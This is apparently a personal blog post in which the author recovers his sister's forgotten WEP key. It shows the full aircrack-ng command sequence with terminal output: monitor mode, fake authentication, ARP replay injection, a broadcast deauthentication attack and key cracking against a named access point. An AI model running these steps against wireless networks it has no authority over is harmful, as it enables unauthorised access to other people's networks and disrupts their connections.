The information below is not intended to harm other people. Cracking other peoples network is considered illegal in most countries!! Last day, my sister called me up because she couldn't connect to her wireless network any more. She was playing with her network connections and broke everything. She didn't know the key for her wireless access point and the access point couldn't be reset because it's on the attic and we couldn't reach it.
So I thought I give it a try to hack the access point. Here are the steps I followed: First I took a look if my laptop could see the wireless network. The network I want to crack is wifi9/7
Let's start cracking the key with the installation of aircrack-ng
I have only one wireless card in my laptop (wlan0) so this is obviously the card I have to use. Next, I have to put my wireless card in monitoring mode
wim@wim-ubuntu:~$ sudo airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
899 NetworkManager
906 avahi-daemon
977 avahi-daemon
1113 wpa_supplicant
2744 dhclient
Process with PID 2744 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)
mon0 is a new interface which I will use for monitoring. If I run the previous command again, mon0 should be listed as interface.
Just let the previous screen run and open a new consolewindow to run a fake attempt for authentication. The value after -a is the MAC-address from the network we want to crack, the -e value is the name of the network
wim@wim-ubuntu:~$ sudo aireplay-ng --fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
19:56:24 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
19:56:24 Sending Authentication Request (Open System) [ACK]
19:56:24 Authentication successful
19:56:24 Sending Association Request [ACK]
19:56:24 Association successful :-) (AID: 1)
The association is successfull. This means the target host doesn't use MAC filtering. This is good for me, so I don't have to spoof my MAC address. Now everything is ready to crack the key. first, if in your first console the airdump command is still running, close it and start it again with an option to save the output to a file:
To actually crack the key, I need a lot of data. In this case, I've only got 4 packets where I need around 100000 so I have to speed things up a little bit by launching aireplay in injection mode in a new console window:
wim@wim-ubuntu:~$ sudo aireplay-ng -3 -b 00:24:01:65:97:69 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
20:07:31 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
Saving ARP requests in replay_arp-0208-200731.cap
You should also start airodump-ng to capture replies.
Read 63 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Now keep the aireplay-ng and airodump-ng running and run the deauth attack.
wim@wim-ubuntu:~$ sudo aireplay-ng --deauth 0 -a 00:24:01:65:97:69 mon0
20:10:02 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c ).
20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
Let everything run. After a few minutes, you should receive ARP requests and the data will start increasing very fast. I've noticed that it goes a little bit faster when I tried to connect in Ubuntu with the target network. When there are enough packets captured, it's time to crack them. I've opened a new console and used following command where crackwepwifi-02.ivs is the file we entered previously:
wim@wim-ubuntu:~$ sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/wim/crackwepwifi-02.ivs
Opening /home/wim/crackwepwifi-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 88000 ivs.
KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 )
Decrypted correctly: 100%
Got it! The key for the network is 06469. I could connect to it without a problem and made my sister happy again :-)